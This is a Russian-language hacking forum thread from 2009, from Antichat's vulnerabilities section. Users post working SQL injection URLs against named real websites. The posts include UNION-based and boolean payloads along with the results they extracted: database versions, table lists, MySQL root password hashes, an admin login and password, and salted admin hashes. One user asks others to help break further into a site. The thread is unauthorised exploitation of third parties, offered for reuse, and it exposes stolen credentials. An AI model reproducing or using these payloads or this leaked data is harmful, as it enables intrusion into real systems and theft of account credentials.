ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9581  
Старый 30.05.2009, 12:10
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

какая то team CS

http://www.fragz-united.de/index.php?site=profile&id=1'+and+substring(version (),1,1)=5+--+


#####################################
PR4

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,concat_ws(0x3a,u ser(),database(),version())+--+

root@localhost:_sites:5.0.26

куча табл

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,table_name+from+ information_schema.tables+--+

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,concat_ws(0x3a,u ser,password,file_priv)+from+mysql.user+--+

root:*8890FECAB5F65D32D9AC16A6D76E1B15F372465A:Y
::N
pma:*6C8DC88838BA26F23FC09ED48861E966C911B4CB:N pma

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,concat_ws(0x3a,' p')+from+mysql.user+--+

p

magic quotes = off

Последний раз редактировалось HAXTA4OK; 30.05.2009 в 12:59..
 
Ответить с цитированием

tests.specialist.ru
  #9582  
Старый 30.05.2009, 15:32
Аватар для InFlame
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию tests.specialist.ru

Online тестирование и сертификация "SPECIALIST"

Version:
http://tests.specialist.ru/complete.asp?Test=10+or+1=@@version--
Цитата:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
db_name:
http://tests.specialist.ru/complete.asp?Test=10+or+1=(select+db_name())--
Цитата:
Tests
User:
http://tests.specialist.ru/complete.asp?Test=10+or+1=(select+system_user)--
Цитата:
IUser
Подбор табличек:
http://tests.specialist.ru/complete.asp?Test=1+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES)--
http://tests.specialist.ru/complete.asp?Test=1+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+where+table_name+NO T+IN+('UnitResult'))--
Цитата:
UnitResult
TestForTG
и т. д.
 
Ответить с цитированием

  #9583  
Старый 30.05.2009, 17:11
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.utg.net.ua/article.php?article_id=8+and+substring(version(),1 ,1)=3

http://www.sttsnn.ru/arhiv.php?menu=1&month=4&year=2007+and+substring(v ersion(),1,1)=4

http://www.permoboz.ru/txt.php?n=6705+and+substring(version(),1,1)=4/*
 
Ответить с цитированием

  #9584  
Старый 30.05.2009, 17:33
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.aiondb.ru./index.php?show_file&id=-1+UnIoN+SeLeCT+1,2,3,4,5,6,concat_ws(0x3a3a,id,abo ut,contact,pw,log,email,phone,copyr,diz,top_zagl,t itle_main,desc_main,title_about,desc_about,title_c ontact,desc_contact,keywords,center_footer,logo_fi le,phone_file,title_clients,desc_clients,title_ord er,desc_order,main_page_text,about_page_text,conta cts_page_text,counter_block),8,9+from+aion_config+--+
1::rhfgbdhfg79::aionadmin::admin@aiondb.ru (З.Ы. То ли пас с логином то ли трэшь?!)
http://www.aiondb.ru/library/vbuser.sql

Хешь админа 86defe53d9974067e9a98f5b7b53eae4 подсолен z$S

Таблы которые открыты:
aion_catalog_razd
aion_razd
aion_config
aion_video
aion_file
aion_video_razd
aion_file_razd
aion_podrazd
Есть удал раб стол дефолтные пассы неподходят
Если кто прокопает дальше - плиз пишите в ПМ))
Совместно с HAXTA4OK'ом ))
 
Ответить с цитированием

  #9585  
Старый 30.05.2009, 17:58
Аватар для Krist_ALL
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Цитата:
http://www.wifilab.ru/catalogue/tovar.php?id=-1232+union+select+1,2,3,4+
users:
ppkvm - 48a5da7d886197c858585e4f1ee52033
maks - 5adcf11410991e502e9fc96ec5a6100a

хеши рассшифровать не удалось.

Version() 5.0.22-log
Database() wifilab_datab
User() wifilab_userd@localhost

GOOGLE PR - 3
YANDEX TIC - 30
 
Ответить с цитированием

  #9586  
Старый 31.05.2009, 00:09
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.bride-style.ru/arhiv.php?s=-15+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4
4.1.22-log:bridesth_bridest@localhost:bridesth_bridesth
 
Ответить с цитированием

  #9587  
Старый 31.05.2009, 01:26
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

http://www.jurasud.fr/show.php?note=1&annuid=109&id=0-35&lien_id=-357+union+select+1,2,3,4,5,6,7,8,9,10,11--
PR: 2
Database Version: 4.0.25-standard-log
Database name: adosovczannu
User name: adosovczannu@10.0.65.148
 
Ответить с цитированием

  #9588  
Старый 31.05.2009, 02:42
Аватар для Amoura
Amoura
Участник форума
Регистрация: 23.01.2008
Сообщений: 182
Провел на форуме:
2268999

Репутация: 410
Отправить сообщение для Amoura с помощью ICQ
По умолчанию

http://www.diversevinyl.com/htm/news.php?id=-903+union+select+1,2,3,4,5,6,7--

5.0.67-community-log:kiboorgu_diverseold:kiboorgu_db@localhost


http://inprint.thesyp.org.uk/news.php?id=124+union+select+1,2,3,4--

4.1.22-log:sypcms:sypcms@localhost
 
Ответить с цитированием

  #9589  
Старый 31.05.2009, 03:50
Аватар для Kimliksiz
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.evernewjokes.com/joke-archives.php?start=0&cat_id=-1%20union%20all%20select%201,2,concat(user,0x3a,pa ssword),4,5,0x625920746152656e7452655878,7,8,9,10, 11,12,13%20from%20admin--

admin:ak47


http://humor.pozri.sk/joke-archives.php?start=25&cat_id=joke-archives.php?start=0&cat_id=-1%20union%20all%20select%201,2,concat(user,0x3a,pa ssword),4,5,0x625920746152656e7452655878,7,8,9,10, 11,12,13%20from%20admin--
 
Ответить с цитированием

  #9590  
Старый 31.05.2009, 09:19
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://domos.by/indsp.php?id=-7+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3
5.0.32-DEBIAN_7ETCH8-LOGOMOSTROY_NEW@LOCALHOSTOM_NEW


http://www.foodsmarket.info/news/arhive.php?id_groups=-7+union+select+1,2,3,concat_ws(0x3a,version(),user (),database

()),5,6,7,8,9,10,11,12

4.1.25:foodsmarketinfo@localhost:foodsmarket_site

http://www.mobilehouse.info/news/arhive.php?id_groups=4+and+substring(version(),1,1 )=4

http://stroyshop.info/news/arhive.php?id_groups=3+and+substring(version(),1,1 )=4

http://foodstorg.com/news/arhive.php?id_groups=1+and+substring(version(),1,1 )=4
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ